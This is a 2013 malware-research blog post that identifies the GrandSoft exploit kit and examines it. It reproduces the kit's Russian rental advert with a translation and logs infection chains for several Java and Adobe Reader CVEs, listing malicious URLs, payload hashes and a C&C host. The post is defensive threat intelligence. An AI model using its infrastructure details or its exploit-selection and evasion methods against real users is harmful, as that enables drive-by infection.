2013-09-09 - Connect the dots

Finally ! Here is ... GrandSoft Private SploitPack !!


(not the logo - just for Thumbnail)

That's a lot of exclamation mark but when you can name something after wondering for months what it was, you want to share the !!!

I've heard of GrandSoft and from what we called Stamp EK/SofosFO since more than a year. And yes....we can link both ! I know it for sure since end of June but can only write about it now cause the pack coder took some vacation...(no way to land on it - it's rent only)

StampEK/SofosFO == GrandSoft !

The first time I wrote about it was one year ago, when a dictionnary was introduced to build the landing pages.
That episode show how important/difficult is to give proper name to threats to ensure everyone is talking about the exact same thing.
No name was really set in the community for that pack. Been told it was NeoSploit, then that for sure was not Neosploit (cause Neosploit was something else...that in fact ends up being Fiesta.....).

Author of this pack is, from time to time, writing feelings/messages in landing and jar file of his pack. Here are some :

Image : Courtesy of Sophos
Read:  Sophos sucks? Being insulted by malware authors can be the best reward




GrandSoft Jar file few days after the CVE-2013-0422 0day
Maybe coincidence but....a Class is using my real firstname (yes...not that hard to find  - and Thanks (you know who you are) for pointing that to me)
and a message to Microsoft team
GrandSoft landing 2013-03-11

GrandSoft Landing 2013-04-15

Advert :
On underground since March 2012.
Piece of Original Advert

Original text of the Advert
------------------------------------------
<-=[ GrandSoft Private SploitPack]=-> (Limited!), Only rent for $

Еcть cвoбoдныe мecтa! ОГРАНИЧЕННО!!!

Прoбив чуть вышe урoвня пo cвязкaм нa пaблик cплoйтaх.
Дoмeны нaши, ИПы нaши, ceрвaк нaш.
От вac трeбуeтcя тoлькo oплaтa и cлaть трaффик.  
Минуcы:
- Сoфт в cтaдии бeттa. (Бывaют трaблы нeзнaчитeльныe, тeм нe мeнee рaбoтa нaд coфтoм вeдeтcя пocтoяннo!)
Плюcы:
+ Свoи дoмeны (Пocтoянныe cмeны дoмeнoв! вceгдa чиcтo пo АВ!)
+ Свoи ceтки IP's (Тaк жe пocтoяннaя cмeня IP'oв! Чуть чтo, тaк cрaзу мeняeм IP. В тoм чиcлe нeпaлит и cпaмхaуc!)
+ Пocтoянный крипт (Кoнeчнo кaк у вceх бывaeт чтo пaлитcя. Нo мы рaбoтaeм и чиcтим, ecли и пaлитcя, тo oбычнo 2-3 АВ нe бoльшe, a чиcтитcя oт 1 чaca дo 3-4)
+ Крипты прoвeряютcя нa виртуaлкaх (Чeкaли, вce плaтныe ceрвиcы АВ cкaнeрoв прoбoвaли, ни oдин нe пoкaзывaл aдeквaтнoгo рeзультaтa пo чиcтoтe  , пo ceрвиcу якoбы cплoйты чиcтыe, a нa дeлe пaлятcя тeм или иным aвeрoм, пoтoму прoвeряeм пoпулярныe АВ нa виртуaлкaх!)
+ Огрaничeннo чиcлo мecт (В нaшeй cфeрe чeм бoльшe кoл-вo иcпoльзующих прoдукт клиeнтoв, тeм мeньшe кaчecтвo, кoнкрeнтo пaлятьcя быcтрee ипы, дoмeны, cплoйты , пoтoму чиcлo клиeнтoв oгрaничeннo!)
+ Вoзмoжнocть грузить dll.
+ Удoбнaя рaбoтa: aвтoaпдeйт eхe, aвтoмaтичecкий eхe aв чeкeр, aв cвязкa чeкeр, aвтo выдaчa линкoв, джaбeр бoт нoтифкaтoр и т.д.

Прoшу oбрaтить внимaниe, у нac нecкoлькo инoй тaрифный рacчeт, тaриф рaccчитывaeтcя из cкoрocти пoтoкa трaффикa в чac.
Тeкущиe тaрифы: (пoтoк трaфa в чac = нeдeля / мecяц).
<10k/hour = 900$ / 3500$
<15k/hour = 1350$ / 5200$
<20k/hour = 1800$ / 7000$
* Лимит нa кoл-вo хocтoв (Лимит в чac!). Пo вoзмoжнocти фильтруйтe нe уникoв, нe виднoвc, хрoм , бoтoв и прoчий шлaк дo oтcылa нa cвязку!

Кoнтaкты:
[email protected]
[email protected]
[email protected]
* Оcнoвнoй кoнтaкт пeрвый, ocтaльныe рeзeрвныe.
* ОТR ecть.


PS: С иcтeричecкими, нeрвными, нeaдeквaтными личнocтями нe рaбoтaю. Увaжaйтe ceбя.
Тaк жe мoгу oткaзaть в рaбoтe бeз oбъяcнeния причин.
PSS: Нe уcтрaивaeт цeнa? Сoрри, вaм cтoит oбрaтитьcя к кoнкурeнтaм. Дaнный вoпрoc нe oбcуждaeтcя, флуд пo нeму тaк жe нe имeeт cмыcлa.
PS кoнкурeнтaм: Пoвышeнный прoбив дocтигaeтcя зa cчeт тoгo, чтo юзaютcя тoлькo чиcтыe дoмeны и ипы, и cплoйты пeрeкриптoвaютcя пo нecкoльку рaз зa дeнь, пoтoму coвeтую вaм нe трaтить cвoe врeмя нa рaзбoр мoeй выдaчи, ничeгo нoвoгo вы тaм нe нaйдeтe, cплoйты тaкиe жe кaк и у вac: 2 джaвa, пдф пaк (eмaл,кoллaб,ньюплeeр,либтиф). Ничeгo cвeрхecтecтвeннoгo , в cвязкe нeт и нe будeт никaких зeрoдeй cплoйтoв.  

I work only with Russian people!
------------------------------------------
Translated by Malwageddon (Thanks !) as :
------------------------------------------
<-=[ GrandSoft Private SploitPack]=-> (Limited!), Only rent for $

We got some places available! LIMITED!!!


Callback rate is slightly better than the one using EKs with publicly available exploits.
We provide domain names, IPs and the server.
You only need to pay and send traffic.

Disadvantages:
- Software is in BETA. (We do experience some difficulties sometimes, but the software is under constant development!)

Advantages:
+ Our domain names (Constantly changing domains! Always AV clean!)
+ Our IP ranges (Also, constantly changing IP addresses. If we find anything suspicious we instantly change the IP. We also stay Spamhuas free.)
+ Constantly encrypting (Of course it happens and the software starts being detected. We work on it and clean it up. Even when it's detected it's 2-3 AVs not more and we clean it up in 1 hour - 3-4 hours most)
+ We use VMs to test new crypts (Checked using all commercial AV scanners - none of them shows an appropriate result though. According to some services the exploits are clean, but in reality are being detected, so we test most popular AVs using VMs )
+ Limited number of places (In our business, the more people using a product the lesser quality you get - IPs, domain names get blacklisted, exploits detected and so on. That's why we limit the number of client!)
+ DLL loading is supported.
+ Easy to use: EXE auto-update, EXE AV auto-checker, EK AV checker, auto links issue, bot notification supports Jabber, etc.

Please note, we have slightly different tariff pricing - it depends on the incoming traffic per hour.
Current pricing: (incoming traffic per hour = week / month).
<10k/hour = 900$ / 3500$
<15k/hour = 1350$ / 5200$
<20k/hour = 1800$ / 7000$
* Amount of hosts limited (per hour!). If possible filter non-unique, non Windows, Chrome, bots and other rubbish prior directing traffic to EK!

Contacts:
[email protected]
[email protected]
[email protected]
* First is the main contact - the rest are reserves.
* OTR is present.

PS: I do not work with hysterical, nervous and senseless people! Respect yourselves.
I can also terminate your service with no reason given.
PSS: Don't like the price? Sorry, ask competitors. I do not negotiate over the prices, so spare yours and mine time.
PS for competitors: Better callback is achieved through only using clean IPs and domain names, also exploits are re-encrypted a few times a day, so spare your time analysing my setup - you won't find anything new. I use the same exploit as you do: 2 Java, PDF pack(email, collab, newplayer, libtiff). There is no 0-days or anything extraordinary and will never be.

I work only with Russian people!
------------------------------------------

I don't know exactly how the admin panel looks like, but here are some traffer/seller page :

GrandSoft Traffer/Seller Page - End of 2012

GrandSoft - Begining of January (before CVE-2013-0422)


Grandsoft Traffer/Seller Page - May 2013

I'll make the First pass with (obviously) the latest java6 publicly available (hot topic...) :
CVE-2013-2463 :
CVE-2013-2463 successful pass on Win7 x64 - jre16u45


GET http://accommodation.romancenu .org/swallowing_cofounder.html
200 OK (text/html) Pastebin

Creation of the next call URL pattern based on Adobe Reader plugin version
(to fire the bullet that fits the hole in the victim's Adobe Reader version  )




GET http://accommodation.romancenu .org/cs9swQXJGQmKXGKQ/11.0./wonder.php5
200 OK (text/html)
Pdf not (yet..?) exploitable...java bullet only is fired !


GET http://accommodation.romancenu .org/b0r1poiiwpr4egraoEawpE4rgwqpD/news.jar
200 OK (application/java-archive) 
 4c477d6d1bfd02b7ff2e6ab7afdf96db
Obfuscated import
Piece of CVE-2013-2463 in GrandSoft jar 2013-09-08


Hex-encoded class acting as downloader
Thanks Chris Wakelin for help!


GET http://accommodation.romancenu .org/b0r1poiiwpr4egraoEawpE4rgwqpD/news.jar
200 OK (application/java-archive) 


GET http://accommodation.romancenu .org/b0r1poiiwpr4egraoEawpE4rgwqpD/2886/4911345
200 OK (application/java-archive) once decoded :  3d1e04ebbb372ca37f87d89b4884871c (Out of Scope Payload. If anyone looks at it, feedback welcome ! :) - C&C : liliputttt8888.com - 70.122.201.25 -  POST /ipv.php  & /html2/   )

CVE-2013-0188 :


CVE-2013-0188 successful path in GrandSoft EK

GET http://xsbqlrm.sole.kosher-qscessationztad.biz/bally_affluent_victim
200 OK (text/html)


GET http://xsbqlrm.sole.kosher-qscessationztad .biz/yfxswQXJGQmKXGKQ/9.3.0/wonder.php5
200 OK (text/html)

GET http://xsbqlrm.sole.kosher-qscessationztad .biz/b3e82oiiwQrgograoEawpE4roDewp/357925970/comfortable.pdf
200 OK (application/pdf)  
79a73625ffd620772d28ddf540b189ff ( I may edit later to study that one more in details)

GET http://xsbqlrm.sole.kosher-qscessationztad .biz/5toiiwQrgograoEawpE4roDewp/337606552/6933484
200 OK (application/pdf) once decoded 76a3b1f6c3635ae9dba3745701a0faf7 (quite surely repack of previous one. Same behaviour)



CVE-2013-0422 :


Double shot by CVE-2013-0422 & CVE-2010-0188 in GrandSoft
Those pattern are for a double shot...otherwise 2nd URL may contains null (no Adobe Reader) or other version of Adobe Reader

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/labels.php
200 OK (text/html)

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/dmwQXJGQmKXGKQ/9.3.0/wonder.php5
200 OK (text/html)

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/43znoiiwwip4graoEawpE4roEwQG/357925970/comfortable.pdf
200 OK (application/pdf)

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/4mwoiiwwip4graoEawpE4roEwQG/news.jar
200 OK (application/java-archive) 790ab433e52423e91779876833660033


Encoded import Class name in CVE-2013-0422 jar in GrandSoft
Decoding variable using Malzilla
(after tiny Java to javascript conversion)
Note the : antimalware(pizdainxuyHero  



GET http://bumped.straining.unfortunately-vrvarcanaicp.biz/4mwoiiwwip4graoEawpE4roEwQG/news.jar
200 OK (application/java-archive)

GET http://bumped.straining.unfortunately-vrvarcanaicp.biz/4mwoiiwwip4graoEawpE4roEwQG/0886/4268355
200 OK (application/java-archive)  once decoded :  3d1e04ebbb372ca37f87d89b4884871c

GET http://bumped.straining.unfortunately-vrvarcanaicp.biz/f8wwoiiwwip4graoEawpE4roEwQG/395526046/6096281
200 OK (application/pdf)


CVE-2011-3544 :
Why ? Cause last CVEs seems to crash with JRE6 <= 18. (Thanks a lot you know who you are)


CVE-2011-3544 Successfull pass in GrandSoft
GET http://experiencing.electingipzxrosstbie .in/invalid
200 OK (text/html)

GET http://experiencing.electingipzxrosstbie .in/5mb6ewQXJGQmKXGKQ/null/wonder.php5
200 OK (text/html)

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/news.jar
200 OK (application/java-archive)  4e17af9e6d7438544aa06918df811dd5


Piece of CVE-2011-3544 in GrandSoft jar
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/news.jar
200 OK (application/java-archive)

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/com.class
404 Not Found (text/html)
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/edu.class
404 Not Found (text/html)
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/net.class
404 Not Found (text/html)
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/org.class
404 Not Found (text/html)

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/1886/7678063
200 OK (application/java-archive) decoded  76a3b1f6c3635ae9dba3745701a0faf7

Exploitation Graph :
Disclaimer : didn't spent a lot of time on PDF so don't put to much credit to the work here.
The java part need some refinement (versions)

Fast (uncomplete) Exploitation Graph for GrandSoft 2013-09-09

Files : Here (Owncloud via goo.gl) (5 fiddler (don't trust the referrer - I often fake it) - 1 payload - 3 jar - 2 pdf)

Read more :
CVE-2013-2465/CVE-2013-2471/CVE-2013-2463 integrating Exploit Kits -- jre7u21 CVE- jre6u45 and earlier - 2013-08-15
Ransomware Spam Pages on Github, Sourceforge, Others - Chris Boyd - 2013-02-07 - GFI
Stamp EK (aka SofosFO) now showing "Blackhole 2.0 Like" landing pages - 2012-10-18